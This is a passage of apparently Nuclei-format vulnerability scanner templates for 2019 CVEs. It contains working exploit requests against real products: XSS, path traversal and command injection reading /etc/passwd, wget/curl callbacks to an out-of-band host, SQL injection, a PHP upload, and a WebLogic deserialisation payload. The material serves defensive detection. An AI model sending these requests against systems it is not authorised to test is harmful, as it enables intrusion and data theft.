1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"word","part":"header","words":["Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void 